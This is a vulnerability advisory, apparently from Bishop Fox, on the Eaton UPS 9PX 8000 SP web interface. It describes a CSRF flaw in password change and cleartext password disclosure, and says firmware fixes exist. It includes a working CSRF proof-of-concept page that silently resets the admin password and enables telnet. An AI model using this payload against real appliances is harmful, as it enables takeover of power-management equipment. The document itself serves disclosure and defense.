The Eaton power management appliance is manufactured by Eaton Corporation. This equipment uses a web interface to allow administrators to configure it. This web interface is where the vulnerabilities were discovered.
Multiple vulnerabilities were identified within the EATON UPS 9PX 8000 SP web application:
These vulnerabilities are described in the following sections.
UPS 9PX 8000 SP
Eaton Corporation closed out the foregoing vulnerabilities by developing and validating firmware that addresses the noted risks. The fix can be found at the following website: https://powerquality.eaton.com/support/software-drivers/downloads/connectivity-firmware.asp
The Eaton web application is affected by one cross-site request forgery (CSRF) vulnerability. This CSRF bug requires user interaction to be executed.
CVE ID: CVE-2018-9281
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-352
CVSS Base Score: 8.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
The administration panel is vulnerable to CSRF attacks in the change password functionality. The vulnerability could be used to force a logged-in administrator to perform a silent password update.
This issue can be triggered by redirecting an administrator who is logged into the Eaton application to a malicious web page.
The code snippet below can be used to exploit this vulnerability:
<head>
<title>CSRF Eaton</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://HOST/Forms/ups_cont_1" method="POST" target="csrf-frame" >
<input type="hidden" name="ManagerLogin" value="admin" >
<input type="hidden" name="NewPassword" value="MyPassword" >
<input type="hidden" name="ConfirmPassword" value="MyPassword" >
<input type="hidden" name="AuthExternal" value="1" >
<input type="hidden" name="SecurityMode" value="1" >
<input type="hidden" name="TelnetAccess" value="on" >
<input type="hidden" name="ConsoleInterface" value="1" >
<input type="hidden" name="Submit" value=" Save " >
</form>
<script>document.getElementById("csrf-form").submit()</script>
<iframe style="display:none" name="csrf-frame2"></iframe>
</body>
The Eaton web application is affected by a password disclosure vulnerability. The Eaton appliance discloses user passwords in two ways, which are described below. To exploit the vulnerability, a malicious user needs to be authenticated to the web application and browse to the affected pages.
CVE ID: CVE-2018-9281 and CVE-2018-9280
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-200
CVSS Base Score: 4.9
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
The web page displayed by the appliance stores user passwords in cleartext. Passwords could be retrieved by browsing the source code of the web page, as shown in the figure below:
The Eaton appliance discloses the SNMP version 3 user's password as well. The web page displayed by the appliance contains the password in cleartext.
Passwords of read/write users could be retrieved by browsing the source code of the web page, as shown in the figure below:
Florian Nivette, Managing Security Associate at Bishop Fox
Kelly Albrink, Security Analyst at Bishop Fox
8240 S. Kyrene Rd.
Suite A113
Tempe, AZ
85284
United States